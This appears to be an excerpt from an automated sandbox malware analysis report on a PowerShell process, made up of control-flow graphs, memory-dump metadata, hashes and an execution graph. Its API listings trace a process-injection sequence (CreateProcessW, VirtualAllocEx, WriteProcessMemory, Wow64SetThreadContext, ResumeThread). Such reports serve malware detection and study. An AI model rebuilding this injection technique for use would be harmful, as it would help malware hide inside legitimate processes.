45a8a10-45a8a1c 659->669 666 45a8ee5 660->666 661->624 671 45a8a4e-45a8aa1 VirtualAllocEx 661->671 672 45a8eec 666->672 668->669 669->660 673 45a8a22-45a8a26 669->673 678 45a8aaa-45a8ac8 671->678 679 45a8aa3-45a8aa9 671->679 677 45a8ef3 672->677 673->658 675 45a8e7f-45a8e92 673->675 675->657 681 45a8efa 677->681 678->666 682 45a8ace-45a8ad5 678->682 679->678 687 45a8f01 681->687 685 45a8adb-45a8ae2 682->685 686 45a8b5c-45a8b63 682->686 685->672 689 45a8ae8-45a8aef 685->689 686->677 688 45a8b69-45a8b70 686->688 693 45a8f0b 687->693 690 45a8b76-45a8b91 call 45a7334 688->690 691 45a8e65-45a8e78 688->691 689->686 692 45a8af1-45a8b43 VirtualAllocEx 689->692 690->681 701 45a8b97-45a8b9e 690->701 691->675 695 45a8b4c-45a8b56 692->695 696 45a8b45-45a8b4b 692->696 700 45a8f12 693->700 695->686 696->695 705 45a8f19 700->705 703 45a8e4b-45a8e5e 701->703 704 45a8ba4-45a8bad 701->704 703->691 704->624 706 45a8bb3-45a8bb9 704->706 709 45a8f23 705->709 706->624 708 45a8bbf-45a8bca 706->708 708->624 712 45a8bd0-45a8bd6 708->712 709->624 713 45a8cd9-45a8cea 712->713 714 45a8bdc-45a8be1 712->714 713->624 718 45a8cf0-45a8d04 call 45a7334 713->718 714->624 715 45a8be7-45a8bfa 714->715 715->624 719 45a8c00-45a8c13 715->719 718->700 723 45a8d0a-45a8d11 718->723 719->624 724 45a8c19-45a8c2e 719->724 725 45a8e17-45a8e2a 723->725 726 45a8d17-45a8d1d 723->726 724->687 731 45a8c34-45a8c38 724->731 740 45a8e31-45a8e44 725->740 726->624 727 45a8d23-45a8d34 726->727 727->705 733 45a8d3a-45a8d3e 727->733 734 45a8c3e-45a8c47 731->734 735 45a8cbf-45a8cc2 731->735 736 45a8d49-45a8d51 733->736 737 45a8d40-45a8d43 733->737 734->624 739 45a8c4d-45a8c50 734->739 735->624 738 45a8cc8-45a8ccb 735->738 736->624 741 45a8d57-45a8d61 736->741 737->736 738->624 742 45a8cd1-45a8cd3 738->742 739->624 743 45a8c56-45a8c86 739->743 740->703 741->628 744 45a8d67-45a8d79 call 45a7340 741->744 742->713 742->714 743->624 752 45a8c8c-45a8ca5 call 45a7334 743->752 744->709 750 45a8d7f-45a8d86 744->750 753 45a8d88-45a8dc6 ResumeThread 750->753 754 45a8de3-45a8df6 750->754 758 45a8caa-45a8cac 752->758 756 45a8dc8-45a8dce 753->756 757 45a8dcf-45a8ddc 753->757 761 45a8dfd-45a8e10 754->761 756->757 760 45a8dde-45a8f94 757->760 757->761 758->693 763 45a8cb2-45a8cb9 758->763 760->664 761->725 763->735 763->740
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d7ff95a887f339ace030c5e62fab492184c67336b82e959ee39f5cd07f2cd29b
                                                                                                                                                              • Instruction ID: 9128c7188cc15c565cfd2b75849e8b5ffccce28a00d21903e383475541fe217c
                                                                                                                                                              • Opcode Fuzzy Hash: d7ff95a887f339ace030c5e62fab492184c67336b82e959ee39f5cd07f2cd29b
                                                                                                                                                              • Instruction Fuzzy Hash: 89F18F70A0021ACFEB24EF25D854B9DB7B6BF84304F1481A9D908AB391EB70ED94DF51

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 768 73f09a8-73f09c0 769 73f0a0d 768->769 770 73f09c2-73f09eb 768->770 773 73f0a0e-73f0a12 769->773 771 73f0bc6-73f0c0e 770->771 772 73f09f1-73f09f6 770->772 785 73f0d7b-73f0d99 771->785 786 73f0c14-73f0c19 771->786 772->773 774 73f09f8-73f09fe 772->774 775 73f0b73-73f0b7d 773->775 776 73f0a13-73f0a1c 773->776 780 73f0a02-73f0a0c 774->780 781 73f0a00 774->781 778 73f0b7f-73f0b88 775->778 779 73f0b8b-73f0b91 775->779 782 73f0a2f 776->782 783 73f0a1e-73f0a2d 776->783 787 73f0b97-73f0ba3 779->787 788 73f0b93-73f0b95 779->788 780->773 781->773 784 73f0a31-73f0a33 782->784 783->784 784->775 793 73f0a39-73f0a59 784->793 807 73f0d3e-73f0d3f 785->807 808 73f0d9b-73f0dad 785->808 789 73f0c1b-73f0c21 786->789 790 73f0c31-73f0c35 786->790 791 73f0ba5-73f0bc3 787->791 788->791 795 73f0c25-73f0c2f 789->795 796 73f0c23 789->796 797 73f0c3b-73f0c3d 790->797 798 73f0d2a-73f0d34 790->798 819 73f0a5b-73f0a76 793->819 820 73f0a78 793->820 795->790 796->790 803 73f0c3f-73f0c4b 797->803 804 73f0c4d 797->804 801 73f0d36-73f0d3d 798->801 802 73f0d42-73f0d48 798->802 801->807 809 73f0d4e-73f0d5a 802->809 810 73f0d4a-73f0d4c 802->810 812 73f0c4f-73f0c51 803->812 804->812 814 73f0daf-73f0dbb 808->814 815 73f0dbd 808->815 816 73f0d5c-73f0d78 809->816 810->816 812->798 817 73f0c57-73f0c59 812->817 821 73f0dbf-73f0dc1 814->821 815->821 823 73f0c5b-73f0c67 817->823 824 73f0c69 817->824 828 73f0a7a-73f0a7c 819->828 820->828 826 73f0e0d-73f0e17 821->826 827 73f0dc3-73f0dc9 821->827 825 73f0c6b-73f0c6d 823->825 824->825 825->798 830 73f0c73-73f0c75 825->830 835 73f0e19-73f0e1f 826->835 836 73f0e22-73f0e28 826->836 833 73f0dcb-73f0dcd 827->833 834 73f0dd7-73f0df4 827->834 828->775 832 73f0a82-73f0a84 828->832 838 73f0c8f-73f0c93 830->838 839 73f0c77-73f0c7d 830->839 842 73f0a86-73f0a92 832->842 843 73f0a94 832->843 833->834 856 73f0e5a-73f0e5f 834->856 857 73f0df6-73f0e07 834->857 840 73f0e2e-73f0e3a 836->840 841 73f0e2a-73f0e2c 836->841 849 73f0cad-73f0d27 838->849 850 73f0c95-73f0c9b 838->850 845 73f0c7f 839->845 846 73f0c81-73f0c8d 839->846 847 73f0e3c-73f0e57 840->847 841->847 844 73f0a96-73f0a98 842->844 843->844 844->775 855 73f0a9e-73f0abe 844->855 845->838 846->838 847->856 853 73f0c9f-73f0cab 850->853 854 73f0c9d 850->854 853->849 854->849 868 73f0ad6-73f0ada 855->868 869 73f0ac0-73f0ac6 855->869 856->857 857->826 872 73f0adc-73f0ae2 868->872 873 73f0af4-73f0af8 868->873 870 73f0aca-73f0acc 869->870 871 73f0ac8 869->871 870->868 871->868 874 73f0ae6-73f0af2 872->874 875 73f0ae4 872->875 876 73f0aff-73f0b01 873->876 874->873 875->873 877 73f0b19-73f0b70 876->877 878 73f0b03-73f0b09 876->878 880 73f0b0d-73f0b0f 878->880 881 73f0b0b 878->881 880->877 881->877
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2117852418.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_73f0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-2291298209
                                                                                                                                                              • Opcode ID: 4768ad6bee64f629d4b47be7d50003faca143cd531bf285068c8028664366cad
                                                                                                                                                              • Instruction ID: 15a73086e8201de79d7f036989f4365bdd62177eb249cf62915fb1378974ff48
                                                                                                                                                              • Opcode Fuzzy Hash: 4768ad6bee64f629d4b47be7d50003faca143cd531bf285068c8028664366cad
                                                                                                                                                              • Instruction Fuzzy Hash: C8412BF0A053069FFF298E2CC9107697BA5AF51294F598067DA08CB2A3D735C940C771

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 883 73f1380-73f13c6 886 73f13cc-73f13d1 883->886 887 73f1572-73f1584 883->887 888 73f13e9-73f13ed 886->888 889 73f13d3-73f13d9 886->889 901 73f159b-73f15ba 887->901 902 73f1586-73f1599 887->902 891 73f151e-73f1528 888->891 892 73f13f3-73f13f5 888->892 893 73f13dd-73f13e7 889->893 894 73f13db 889->894 898 73f152a-73f1533 891->898 899 73f1536-73f153c 891->899 896 73f13f7-73f1403 892->896 897 73f1405 892->897 893->888 894->888 903 73f1407-73f1409 896->903 897->903 904 73f153e-73f1540 899->904 905 73f1542-73f154e 899->905 906 73f16ec-73f171d 901->906 907 73f15c0-73f15c5 901->907 902->901 903->891 908 73f140f-73f1413 903->908 909 73f1550-73f156f 904->909 905->909 927 73f171f-73f172b 906->927 928 73f172d 906->928 910 73f15dd-73f15e1 907->910 911 73f15c7-73f15cd 907->911 912 73f1426 908->912 913 73f1415-73f1424 908->913 918 73f169e-73f16a8 910->918 919 73f15e7-73f15e9 910->919 915 73f15cf 911->915 916 73f15d1-73f15db 911->916 917 73f1428-73f142a 912->917 913->917 915->910 916->910 917->891 924 73f1430-73f1432 917->924 922 73f16aa-73f16b2 918->922 923 73f16b5-73f16bb 918->923 925 73f15eb-73f15f7 919->925 926 73f15f9 919->926 930 73f16bd-73f16bf 923->930 931 73f16c1-73f16cd 923->931 933 73f1434-73f1440 924->933 934 73f1442 924->934 935 73f15fb-73f15fd 925->935 926->935 929 73f172f-73f1731 927->929 928->929 938 73f179f-73f17a9 929->938 939 73f1733-73f1752 929->939 940 73f16cf-73f16e9 930->940 931->940 941 73f1444-73f1446 933->941 934->941 935->918 937 73f1603-73f1605 935->937 942 73f161f-73f162a 937->942 943 73f1607-73f160d 937->943 946 73f17ab-73f17af 938->946 947 73f17b2-73f17b8 938->947 971 73f1754-73f1760 939->971 972 73f1762 939->972 941->891 945 73f144c-73f144e 941->945 967 73f162c-73f1632 942->967 968 73f1642-73f169b 942->968 950 73f160f 943->950 951 73f1611-73f161d 943->951 954 73f1468-73f1473 945->954 955 73f1450-73f1456 945->955 948 73f17be-73f17ca 947->948 949 73f17ba-73f17bc 947->949 958 73f17cc-73f17ea 948->958 949->958 950->942 951->942 959 73f1475-73f1478 954->959 960 73f1482-73f148e 954->960 956 73f145a-73f1466 955->956 957 73f1458 955->957 956->954 957->954 959->960 965 73f149c-73f14a3 960->965 966 73f1490-73f1492 960->966 978 73f14aa-73f14ac 965->978 966->965 974 73f1636-73f1638 967->974 975 73f1634 967->975 977 73f1764-73f1766 971->977 972->977 974->968 975->968 977->938 979 73f1768-73f1785 977->979 981 73f14ae-73f14b4 978->981 982 73f14c4-73f151b 978->982 987 73f17ed-73f17f2 979->987 988 73f1787-73f1799 979->988 984 73f14b8-73f14ba 981->984 985 73f14b6 981->985 984->982 985->982 987->988 988->938
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2117852418.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_73f0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-2291298209
                                                                                                                                                              • Opcode ID: 2b3d904baf59917083db92b7b94a39eb5ca1bce0d304d7637673c76866897507
                                                                                                                                                              • Instruction ID: 64e649a8ca2c133c8bacbbd8d45c91cfe6cf022e1f8e625afd5137243aad1588
                                                                                                                                                              • Opcode Fuzzy Hash: 2b3d904baf59917083db92b7b94a39eb5ca1bce0d304d7637673c76866897507
                                                                                                                                                              • Instruction Fuzzy Hash: E23124F0D0031EDFEB259F29E5406657BF4AF826A0F1980A6C91CCF152E735C945CB62

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 990 45a7310-45a9049 992 45a904b-45a904e 990->992 993 45a9051-45a9058 990->993 992->993 994 45a905a-45a9060 993->994 995 45a9063-45a9079 993->995 994->995 996 45a907b-45a9081 995->996 997 45a9084-45a9127 CreateProcessW 995->997 996->997 999 45a9129-45a912f 997->999 1000 45a9130-45a91a8 997->1000 999->1000 1007 45a91ba-45a91c1 1000->1007 1008 45a91aa-45a91b0 1000->1008 1009 45a91d8 1007->1009 1010 45a91c3-45a91d2 1007->1010 1008->1007 1012 45a91d9 1009->1012 1010->1009 1012->1012
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72AC10FC,?), ref: 045A9114
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                              • Opcode ID: aa951011126fdbd25842ae56c892ad581a19bf92075d1c2f0e5d52af8856f655
                                                                                                                                                              • Instruction ID: 4cd3a53d5154ca220084a2b5508bcdb0556c427d1a8a37471c3af89f877f0519
                                                                                                                                                              • Opcode Fuzzy Hash: aa951011126fdbd25842ae56c892ad581a19bf92075d1c2f0e5d52af8856f655
                                                                                                                                                              • Instruction Fuzzy Hash: D1513BB1D0122ADFDB24CF99C944BDDBBB5BF48304F1084AAE909B7250D771AA84DF90

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1013 45a8fcf-45a9049 1015 45a904b-45a904e 1013->1015 1016 45a9051-45a9058 1013->1016 1015->1016 1017 45a905a-45a9060 1016->1017 1018 45a9063-45a9079 1016->1018 1017->1018 1019 45a907b-45a9081 1018->1019 1020 45a9084-45a9127 CreateProcessW 1018->1020 1019->1020 1022 45a9129-45a912f 1020->1022 1023 45a9130-45a91a8 1020->1023 1022->1023 1030 45a91ba-45a91c1 1023->1030 1031 45a91aa-45a91b0 1023->1031 1032 45a91d8 1030->1032 1033 45a91c3-45a91d2 1030->1033 1031->1030 1035 45a91d9 1032->1035 1033->1032 1035->1035
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72AC10FC,?), ref: 045A9114
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                              • Opcode ID: df89eff2fcfc3486a9149bf9c5462ad3dc0416aa5e4e70ee695b2db4ac0bd187
                                                                                                                                                              • Instruction ID: 637a2967d3dc72e731b751e7ed32c557cf9b7cbb5627f5e1d5a28503e1a841da
                                                                                                                                                              • Opcode Fuzzy Hash: df89eff2fcfc3486a9149bf9c5462ad3dc0416aa5e4e70ee695b2db4ac0bd187
                                                                                                                                                              • Instruction Fuzzy Hash: E1512AB1D0122ADFDB24CF99C944BDDBBB5BF48304F1484AAE909B7250D775AA88CF50

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1036 45a7334-45a93ce 1038 45a93d8-45a9411 WriteProcessMemory 1036->1038 1039 45a93d0-45a93d6 1036->1039 1040 45a941a-45a943b 1038->1040 1041 45a9413-45a9419 1038->1041 1039->1038 1041->1040
                                                                                                                                                              APIs
                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,185D2514,00000000,?,?,?,00000000,00000000,?,045A8B8F,?,00000000,?), ref: 045A9404
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                              • Opcode ID: b23e71dff56886c80056be061e1a51fbbc4ce941a0b1405a5ec9cb3fe5770581
                                                                                                                                                              • Instruction ID: 072e9a6507e582f008835a47c5c349b84547b277aebfb07d551022603198135b
                                                                                                                                                              • Opcode Fuzzy Hash: b23e71dff56886c80056be061e1a51fbbc4ce941a0b1405a5ec9cb3fe5770581
                                                                                                                                                              • Instruction Fuzzy Hash: A22107B1900319DFDB10CF9AD884BDEBBF4FB48320F10842AE958A7250D378A954DFA5

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1043 45a9383-45a93ce 1045 45a93d8-45a9411 WriteProcessMemory 1043->1045 1046 45a93d0-45a93d6 1043->1046 1047 45a941a-45a943b 1045->1047 1048 45a9413-45a9419 1045->1048 1046->1045 1048->1047
                                                                                                                                                              APIs
                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,185D2514,00000000,?,?,?,00000000,00000000,?,045A8B8F,?,00000000,?), ref: 045A9404
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                              • Opcode ID: ec6e6be5fffaa55750ac4abb88bd1f3581257b6fd0d8dae4e3f6abe799921661
                                                                                                                                                              • Instruction ID: 49fc6b7661da880acfb2672e7cb2d60b4f18b3ff78dcf878bc14a241da136062
                                                                                                                                                              • Opcode Fuzzy Hash: ec6e6be5fffaa55750ac4abb88bd1f3581257b6fd0d8dae4e3f6abe799921661
                                                                                                                                                              • Instruction Fuzzy Hash: 3721F5B19013199FDB10CF9AD884BDEBBF8FB48320F10842AE558A7250D378A544CFA5

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1064 45a920b-45a9250 1066 45a925c-45a9288 Wow64SetThreadContext 1064->1066 1067 45a9252-45a925a 1064->1067 1068 45a928a-45a9290 1066->1068 1069 45a9291-45a92b2 1066->1069 1067->1066 1068->1069
                                                                                                                                                              APIs
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,045A8943), ref: 045A927B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                              • Opcode ID: 79964fe304802b6cdc9979d9b2f06d965d3de5d76381275203ae884fcab45612
                                                                                                                                                              • Instruction ID: 51639ac70789bc3d298a08ec740d33f15ef39a8f1fbd0f7cf1d1485e56fead58
                                                                                                                                                              • Opcode Fuzzy Hash: 79964fe304802b6cdc9979d9b2f06d965d3de5d76381275203ae884fcab45612
                                                                                                                                                              • Instruction Fuzzy Hash: A91129B6D002598FDB10CFAAD844BDEFBF4AB89324F148429D458A3240D778A545CFA5

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1057 45a7340-45a9250 1059 45a925c-45a9288 Wow64SetThreadContext 1057->1059 1060 45a9252-45a925a 1057->1060 1061 45a928a-45a9290 1059->1061 1062 45a9291-45a92b2 1059->1062 1060->1059 1061->1062
                                                                                                                                                              APIs
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,045A8943), ref: 045A927B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                              • Opcode ID: febb09ba2ac87a4a82505034b6d4dba0073843e7f4810ef52bc2366f7a6370d6
                                                                                                                                                              • Instruction ID: 4d7e9e5d04e6913222da6317803e43d448dc883a5a881d78c4de2c5f7863925a
                                                                                                                                                              • Opcode Fuzzy Hash: febb09ba2ac87a4a82505034b6d4dba0073843e7f4810ef52bc2366f7a6370d6
                                                                                                                                                              • Instruction Fuzzy Hash: E11112B29002198FDB10CF9AD844BDEBBF4EB88324F14882AE458B3240D378A554CFA5

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1050 45a731c-45a9250 1052 45a925c-45a9288 Wow64SetThreadContext 1050->1052 1053 45a9252-45a925a 1050->1053 1054 45a928a-45a9290 1052->1054 1055 45a9291-45a92b2 1052->1055 1053->1052 1054->1055
                                                                                                                                                              APIs
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,045A8943), ref: 045A927B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                              • Opcode ID: 7f30acdd81cbcc3431baf41922c0b7ee9c31877fd7a69cee7ec677bb8e87c3ce
                                                                                                                                                              • Instruction ID: 5e890cfc2934b050c9ac43d24a15f473eb48402cb60bbb88b4a640be209c202f
                                                                                                                                                              • Opcode Fuzzy Hash: 7f30acdd81cbcc3431baf41922c0b7ee9c31877fd7a69cee7ec677bb8e87c3ce
                                                                                                                                                              • Instruction Fuzzy Hash: 321112B29002198FDB10CF9AD844BDEBBF4EB89324F54882AE458B3240D378A544CFA5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2117852418.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_73f0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                              • Opcode ID: 02bae95b1923e5074aae9d7cf64cc867b7aaeb75487cc1bbd8a1e9f20787b018
                                                                                                                                                              • Instruction ID: 1d8d43af2b02272679daae6f79349f16fe990e2aa00b86763aad347a6b07ccb8
                                                                                                                                                              • Opcode Fuzzy Hash: 02bae95b1923e5074aae9d7cf64cc867b7aaeb75487cc1bbd8a1e9f20787b018
                                                                                                                                                              • Instruction Fuzzy Hash: CA21D5F1A0530BDFEB14CF25D444A6A7BF1BF816A0F148266D24CCB265D731C885CB92
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075106708.000000000445D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0445D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_445d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7fffa0169af54488789dc1b0aa247a575e904d3c6547e434709137f12a8f39f4
                                                                                                                                                              • Instruction ID: c81de09c4a587bc4e48e6fd66a928009ac73182b5eca39fd2d234e6c1aa33a23
                                                                                                                                                              • Opcode Fuzzy Hash: 7fffa0169af54488789dc1b0aa247a575e904d3c6547e434709137f12a8f39f4
                                                                                                                                                              • Instruction Fuzzy Hash: 93012D6240D3C09FDB128B259D94652BFB8DF47624F19C4DBEC888F2A7C2695C45C772
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075106708.000000000445D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0445D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_445d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7cd51ca77b552853db299eccc4c7b56d1b50b7c860cab12eb27ae0a3eb31e397
                                                                                                                                                              • Instruction ID: d7fad3611b253d7ee477b4e7baad809cbd17667280c24878cc4e68f037851dce
                                                                                                                                                              • Opcode Fuzzy Hash: 7cd51ca77b552853db299eccc4c7b56d1b50b7c860cab12eb27ae0a3eb31e397
                                                                                                                                                              • Instruction Fuzzy Hash: 01012BB19093009AEF204E25DD84767BF98DF41728F08C42BEC084B397C279E842C6B1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2117852418.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_73f0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-1041444323
                                                                                                                                                              • Opcode ID: daa57711dff4d4929eb158f15714b813c5f1f62aa4f8ce9a86c4248f15ed05a2
                                                                                                                                                              • Instruction ID: 31ccf9677ffcf4e7ba62678dc2bdb2321b76e6c41f09ced8f3658ee25a36c5e2
                                                                                                                                                              • Opcode Fuzzy Hash: daa57711dff4d4929eb158f15714b813c5f1f62aa4f8ce9a86c4248f15ed05a2
                                                                                                                                                              • Instruction Fuzzy Hash: DF216AF1B0934A4FEB2D156D2824176ABF7DFC19A0729456BC108CF35BDE118C4983D2

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:5%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:3.9%
                                                                                                                                                              Signature Coverage:6.4%
                                                                                                                                                              Total number of Nodes:1773
                                                                                                                                                              Total number of Limit Nodes:61
                                                                                                                                                              execution_graph 51307 41d4d0 51309 41d4e6 ctype ___scrt_fastfail 51307->51309 51308 41d6e3 51313 41d734 51308->51313 51323 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 51308->51323 51309->51308 51311 431f99 21 API calls 51309->51311 51315 41d696 ___scrt_fastfail 51311->51315 51312 41d6f4 51312->51313 51314 41d760 51312->51314 51324 431f99 51312->51324 51314->51313 51332 41d474 21 API calls ___scrt_fastfail 51314->51332 51315->51313 51317 431f99 21 API calls 51315->51317 51321 41d6be ___scrt_fastfail 51317->51321 51319 41d72d ___scrt_fastfail 51319->51313 51329 43264f 51319->51329 51321->51313 51322 431f99 21 API calls 51321->51322 51322->51308 51323->51312 51325 431fa3 51324->51325 51326 431fa7 51324->51326 51325->51319 51333 43a88c 51326->51333 51342 43256f 51329->51342 51331 432657 51331->51314 51332->51313 51335 446aff _strftime 51333->51335 51334 446b3d 51341 445354 20 API calls __dosmaperr 51334->51341 51335->51334 51336 446b28 RtlAllocateHeap 51335->51336 51340 442200 7 API calls 2 library calls 51335->51340 51336->51335 51338 431fac 51336->51338 51338->51319 51340->51335 51341->51338 51343 432588 51342->51343 51347 43257e 51342->51347 51344 431f99 21 API calls 51343->51344 51343->51347 51345 4325a9 51344->51345 51345->51347 51348 43293a CryptAcquireContextA 51345->51348 51347->51331 51349 43295b CryptGenRandom 51348->51349 51351 432956 51348->51351 51350 432970 CryptReleaseContext 51349->51350 51349->51351 51350->51351 51351->51347 51352 426030 51357 4260f7 recv 51352->51357 51358 44e8b6 51359 44e8c1 51358->51359 51360 44e8e9 51359->51360 51361 44e8da 51359->51361 51362 44e8f8 51360->51362 51380 455573 27 API 